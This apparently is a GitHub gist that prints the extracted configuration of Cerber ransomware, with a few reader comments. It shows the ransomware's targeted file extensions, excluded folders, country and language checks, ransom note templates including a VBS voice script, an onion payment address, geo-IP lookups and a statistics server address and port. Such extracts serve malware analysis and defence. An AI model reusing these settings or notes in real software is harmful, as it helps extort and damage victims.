cerber ransomware
{ | |
"antiav": 1, | |
"blacklist": { | |
"countries": [ | |
"am", | |
"az", | |
"by", | |
"ge", | |
"kg", | |
"kz", | |
"md", | |
"ru", | |
"tm", | |
"tj", | |
"ua", | |
"uz" | |
], | |
"files": [ | |
"bootsect.bak", | |
"iconcache.db", | |
"thumbs.db", | |
"wallet.dat" | |
], | |
"folders": [ | |
":\\$recycle.bin\\",": \\$windows.~bt\\", | |
":\\boot\\",": \\drivers\\", | |
":\\program files\\",": \\program files (x86)\\", | |
":\\programdata\\",": \\users\\all users\\", | |
":\\windows\\","\\appdata\\local\\", | |
"\\appdata\\locallow\\","\\appdata\\roaming\\", | |
"\\public\\music\\sample music\\","\\public\\pictures\\sample pictures\\", | |
"\\public\\videos\\sample videos\\","\\tor browser\\" | |
], | |
"languages": [ | |
1049, | |
1058, | |
1059, | |
1064, | |
1067, | |
1068, | |
1079, | |
1087, | |
1088, | |
1090, | |
1091, | |
2072, | |
2073, | |
2092, | |
2115 | |
] | |
}, | |
"check": { | |
"activity": 0, | |
"country": 1, | |
"language": 1, | |
"vmware": 0 | |
}, | |
"debug": 0, | |
"encrypt": { | |
"files": [ | |
[ | |
".contact", | |
".dbx", | |
".doc", | |
".docx", | |
".jnt", | |
".jpg", | |
".mapimail", | |
".msg", | |
".oab", | |
".ods", | |
".pdf", | |
".pps", | |
".ppsm", | |
".ppt", | |
".pptm", | |
".prf", | |
".pst", | |
".rar", | |
".rtf", | |
".txt", | |
".wab", | |
".xls", | |
".xlsx", | |
".xml", | |
".zip", | |
".1cd", | |
".3ds", | |
".3g2", | |
".3gp", | |
".7z", | |
".7zip", | |
".accdb", | |
".aoi", | |
".asf", | |
".asp", | |
".aspx", | |
".asx", | |
".avi", | |
".bak", | |
".cer", | |
".cfg", | |
".class", | |
".config", | |
".css", | |
".csv", | |
".db", | |
".dds", | |
".dwg", | |
".dxf", | |
".flf", | |
".flv", | |
".html", | |
".idx", | |
".js", | |
".key", | |
".kwm", | |
".laccdb", | |
".ldf", | |
".lit", | |
".m3u", | |
".mbx", | |
".md", | |
".mdf", | |
".mid", | |
".mlb", | |
".mov", | |
".mp3", | |
".mp4", | |
".mpg", | |
".obj", | |
".odt", | |
".pages", | |
".php", | |
".psd", | |
".pwm", | |
".rm", | |
".safe", | |
".sav", | |
".save", | |
".sql", | |
".srt", | |
".swf", | |
".thm", | |
".vob", | |
".wav", | |
".wma", | |
".wmv", | |
".xlsb", | |
".3dm", | |
".aac", | |
".ai", | |
".arw", | |
".c", | |
".cdr", | |
".cls", | |
".cpi", | |
".cpp", | |
".cs", | |
".db3", | |
".docm", | |
".dot", | |
".dotm", | |
".dotx", | |
".drw", | |
".dxb", | |
".eps", | |
".fla", | |
".flac", | |
".fxg", | |
".java", | |
".m", | |
".m4v", | |
".max", | |
".mdb", | |
".pcd", | |
".pct", | |
".pl", | |
".potm", | |
".potx", | |
".ppam", | |
".ppsm", | |
".ppsx", | |
".pptm", | |
".ps", | |
".pspimage", | |
".r3d", | |
".rw2", | |
".sldm", | |
".sldx", | |
".svg", | |
".tga", | |
".wps", | |
".xla", | |
".xlam", | |
".xlm", | |
".xlr", | |
".xlsm", | |
".xlt", | |
".xltm", | |
".xltx", | |
".xlw", | |
".act", | |
".adp", | |
".al", | |
".bkp", | |
".blend", | |
".cdf", | |
".cdx", | |
".cgm", | |
".cr2", | |
".crt", | |
".dac", | |
".dbf", | |
".dcr", | |
".ddd", | |
".design", | |
".dtd", | |
".fdb", | |
".fff", | |
".fpx", | |
".h", | |
".iif", | |
".indd", | |
".jpeg", | |
".mos", | |
".nd", | |
".nsd", | |
".nsf", | |
".nsg", | |
".nsh", | |
".odc", | |
".odp", | |
".oil", | |
".pas", | |
".pat", | |
".pef", | |
".pfx", | |
".ptx", | |
".qbb", | |
".qbm", | |
".sas7bdat", | |
".say", | |
".st4", | |
".st6", | |
".stc", | |
".sxc", | |
".sxw", | |
".tlg", | |
".wad", | |
".xlk", | |
".aiff", | |
".bin", | |
".bmp", | |
".cmt", | |
".dat", | |
".dit", | |
".edb", | |
".flvv", | |
".gif", | |
".groups", | |
".hdd", | |
".hpp", | |
".log", | |
".m2ts", | |
".m4p", | |
".mkv", | |
".mpeg", | |
".ndf", | |
".nvram", | |
".ogg", | |
".ost", | |
".pab", | |
".pdb", | |
".pif", | |
".png", | |
".qed", | |
".qcow", | |
".qcow2", | |
".rvt", | |
".st7", | |
".stm", | |
".vbox", | |
".vdi", | |
".vhd", | |
".vhdx", | |
".vmdk", | |
".vmsd", | |
".vmx", | |
".vmxf", | |
".3fr", | |
".3pr", | |
".ab4", | |
".accde", | |
".accdr", | |
".accdt", | |
".ach", | |
".acr", | |
".adb", | |
".ads", | |
".agdl", | |
".ait", | |
".apj", | |
".asm", | |
".awg", | |
".back", | |
".backup", | |
".backupdb", | |
".bank", | |
".bay", | |
".bdb", | |
".bgt", | |
".bik", | |
".bpw", | |
".cdr3", | |
".cdr4", | |
".cdr5", | |
".cdr6", | |
".cdrw", | |
".ce1", | |
".ce2", | |
".cib", | |
".craw", | |
".crw", | |
".csh", | |
".csl", | |
".db_journal", | |
".dc2", | |
".dcs", | |
".ddoc", | |
".ddrw", | |
".der", | |
".des", | |
".dgc", | |
".djvu", | |
".dng", | |
".drf", | |
".dxg", | |
".eml", | |
".erbsql", | |
".erf", | |
".exf", | |
".ffd", | |
".fh", | |
".fhd", | |
".gray", | |
".grey", | |
".gry", | |
".hbk", | |
".ibank", | |
".ibd", | |
".ibz", | |
".iiq", | |
".incpas", | |
".jpe", | |
".kc2", | |
".kdbx", | |
".kdc", | |
".kpdx", | |
".lua", | |
".mdc", | |
".mef", | |
".mfw", | |
".mmw", | |
".mny", | |
".moneywell", | |
".mrw", | |
".myd", | |
".ndd", | |
".nef", | |
".nk2", | |
".nop", | |
".nrw", | |
".ns2", | |
".ns3", | |
".ns4", | |
".nwb", | |
".nx2", | |
".nxl", | |
".nyf", | |
".odb", | |
".odf", | |
".odg", | |
".odm", | |
".orf", | |
".otg", | |
".oth", | |
".otp", | |
".ots", | |
".ott", | |
".p12", | |
".p7b", | |
".p7c", | |
".pdd", | |
".pem", | |
".plus_muhd", | |
".plc", | |
".pot", | |
".pptx", | |
".psafe3", | |
".py", | |
".qba", | |
".qbr", | |
".qbw", | |
".qbx", | |
".qby", | |
".raf", | |
".rat", | |
".raw", | |
".rdb", | |
".rwl", | |
".rwz", | |
".s3db", | |
".sd0", | |
".sda", | |
".sdf", | |
".sqlite", | |
".sqlite3", | |
".sqlitedb", | |
".sr2", | |
".srf", | |
".srw", | |
".st5", | |
".st8", | |
".std", | |
".sti", | |
".stw", | |
".stx", | |
".sxd", | |
".sxg", | |
".sxi", | |
".sxm", | |
".tex", | |
".wallet", | |
".wb2", | |
".wpd", | |
".x11", | |
".x3f", | |
".xis", | |
".ycbcra", | |
".yuv" | |
] | |
], | |
"network": 0, | |
"new_extension": ".cerber", | |
"max_block_size": 2, | |
"max_blocks": 5, | |
"min_file_size": 0, | |
"multithread": 1, | |
"rsa_key_size": 576 | |
}, | |
"global_public_key": "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1QN0laTm1zMUFBN0dQUVVUaE1XYllpRVlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRhMDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0yY29lYURHdmNHUkFjOWU3Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFRXZzdrUE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0RU5Wd2ZOTkVwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4amlFbWMwZnN6azJXTFNuCnFyeWlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRGWVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFEMEgKblFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==", | |
"help_files": { | |
"files": [ | |
{ | |
"file_body": "\r\n\r\n C E R B E R\r\n -----------\r\n\r\n\r\n Your documents, photos, databases and other important files have been encrypted!\r\n\r\n\r\n To decrypt your files follow the instructions:\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n 1. Download and install the \"Tor Browser\" from https:\/\/www.torproject.org\/\r\n\r\n\r\n 2. Run it\r\n\r\n\r\n 3. In the \"Tor Browser\" open website:\r\n\r\n http:\/\/decrypttozxybarc.onion\/{PC_ID}\r\n\r\n\r\n 4. Follow the instructions at this website\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n \u00c2\u00ab...Quod me non necat me fortiorem facit.\u00c2\u00bb\r\n", | |
"file_extension": ".txt" | |
}, | |
{ | |
"file_body": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <link href=\"http:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap.min.css\" rel=\"stylesheet\">\r\n <meta charset=\"utf-8\">\r\n <meta content=\"IE=edge\" http-equiv=\"X-UA-Compatible\">\r\n <meta content=\"width=device-width, initial-scale=1\" name=\"viewport\">\r\n <title>C E R B E R<\/title>\r\n <\/head>\r\n <body>\r\n <div class=\"container\">\r\n <h3 align=\"center\">C E R B E R<\/h3>\r\n <br \/>\r\n <h4>Your documents, photos, databases and other important files have been encrypted!<br \/><br \/>To decrypt your files follow the instructions:<\/h4>\r\n <br \/>\r\n <div class=\"well\">\r\n <h4>1. Download and install the «Tor Browser» from <a href=\"https:\/\/www.torproject.org\/download\/download-easy.html.en\" target=\"_blank\">https:\/\/www.torproject.org\/<\/a><\/h4>\r\n <br \/>\r\n <h4>2. Run it<\/h4>\r\n <br \/>\r\n <h4>3. In the «Tor Browser» open website:<br \/><br \/><div class=\"form-group\" style=\"margin: 0 32px 36px 32px;\"><input class=\"form-control\" style=\"color: #c24; font-size: 22px; height: 50px; text-align: center;\" type=\"text\" value=\"http:\/\/decrypttozxybarc.onion\/{PC_ID}\" readonly><\/div><\/h4>\r\n <h4>4. Follow the instructions at this website<\/h4>\r\n <\/div>\r\n <br \/>\r\n <p style=\"color: #ccc;\">«...Quod me non necat me fortiorem facit.»<\/p>\r\n <br \/>\r\n <\/div>\r\n <\/body>\r\n<\/html>\r\n", | |
"file_extension": ".html" | |
}, | |
{ | |
"file_body": "Set SAPI = CreateObject(\"SAPI.SpVoice\")\r\nSAPI.Speak \"Attention! Attention! Attention!\"\r\nFor i = 1 to 5\r\nSAPI.Speak \"Your documents, photos, databases and other important files have been encrypted!\"\r\nNext", | |
"file_extension": ".vbs" | |
} | |
], | |
"files_name": "# DECRYPT MY FILES #" | |
}, | |
"ip_geo": [ | |
{ | |
"property_name": "country", | |
"url": "http:\/\/ipinfo.io\/json" | |
}, | |
{ | |
"property_name": "country_code", | |
"url": "http:\/\/freegeoip.net\/json\/" | |
}, | |
{ | |
"property_name": "countryCode", | |
"url": "http:\/\/ip-api.com\/json" | |
} | |
], | |
"servers": { | |
"statistics": { | |
"data_finish": "{MD5_KEY}", | |
"data_start": "{MD5_KEY}{PARTNER_ID}{OS}{IS_X64}{IS_ADMIN}{COUNT_FILES}{STOP_REASON}", | |
"ip": "87.98.128.0\/19", | |
"port": 6891, | |
"send_stat": 1, | |
"timeout": 1020 | |
} | |
} | |
} |
-----BEGIN PUBLIC KEY----- | |
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvkty5qhqEydR9076Fevp | |
0uMP7IZNms1AA7GPQUThMWbYiEYIhBKcT0/nwYrBq0Ogv79K1tta04EHTrXgcAp/ | |
OJgBhz9N58aewd4yZBm2coeaDGvcGRAc9e72ObFQ/TME/Io7LZ5qXDWzDafI8LA8 | |
JQmSz0L+/G+LPTWg7kPOpJT7WSkRb9T8w5QgZRJuvvhErHM83kO3ELTH+SoEI53p | |
4ENVwfNNEpOpnpOOSKQobtIw56CsQFrhac0sQlOjek/muVluxjiEmc0fszk2WLSn | |
qryiMyzaI5DWBDjYKXA1tp2h/ygbkYdFYRbAEqwtLxT2wMfWPQI5OkhTa9tZqD0H | |
nQIDAQAB | |
-----END PUBLIC KEY----- |
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
Can you share how you extracted this from the EXE? |
This comment has been minimized.
This comment has been minimized.
Hi Guys, I got infected with Ransom virus last weekend and i managed to clean my laptop (apparently) but im stuck with the encrypted files. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Could you send me encrypted file for this